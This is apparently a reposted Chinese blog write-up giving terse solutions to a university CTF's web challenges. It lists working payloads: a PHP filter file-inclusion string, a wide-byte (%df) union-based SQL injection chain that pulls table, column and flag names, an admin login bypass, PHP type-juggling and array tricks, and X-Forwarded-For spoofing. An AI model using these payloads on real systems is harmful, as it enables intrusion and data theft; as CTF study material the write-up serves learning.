當前位置：首頁 > 运维知识 > 数据库 >内容正文

数据库

mysql 南邮ctf_南邮ctf web

發布時間：2024/9/18 数据库 32 豆豆

生活随笔收集整理的這篇文章主要介紹了 mysql 南邮ctf_南邮ctf web 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

簽到題

查看源碼就可得到

md5 collision

Poc:a=240610708

簽到2

關鍵點：輸入框設定了最大的長度限制

層層遞進

在iframe標簽屬性都為0，查看鏈接，一直點下去發現404.html，16行-35行，getflag

AAencode

單身二十年

源碼點擊./search_key.php，getflag

你從哪里來

文件包含

Poc：file=php://filter/convert.base64-encode/resource=index.php

單身一百年也沒用

點擊到這里找key，查看響應頭，getflag

Download~!

Poc：url=ZG93bmxvYWQucGhw

Cookie: Login=1

MYSQL

1、查看robots.txt

2、sql.php?id=1024.00001

sql injection 3

id=2,gbk

id=1%df’ union select 1,2 –+

id=1%df’ union select database(),2 –+

回顯sqli

id=1%df’ union select 1,table_name from information_schema.tables where table_schema=0x73716C6931

回顯 falg

id=1%df’ union select 1,cloumn_name from information_schema.columns where table_schema=0x73716C6931

回顯 fl4g

id=1%df’ union select 1,fl4g from flag –+

/x00

Poc:nctf[]=1.#biubiubiu

bypass again

Poc:a[]=1&b[]=2

變量覆蓋

POST：pass=123&thepassword_123=123

PHP是世界上最好的語言

Poc:id=%2568ackerDJ

偽裝者

x-forwarded-for: 127.0.0.1

上傳繞過

SQL注入1

admin’)#&111

pass check

輸入123，抓包改為傳入數組

起名字真難

Poc：key=0xccccccccc

總結

以上是生活随笔為你收集整理的mysql 南邮ctf_南邮ctf web的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇：影子图书馆“安娜的档案”宣布获得超星旗下
下一篇： mysql hex函数性能_mysql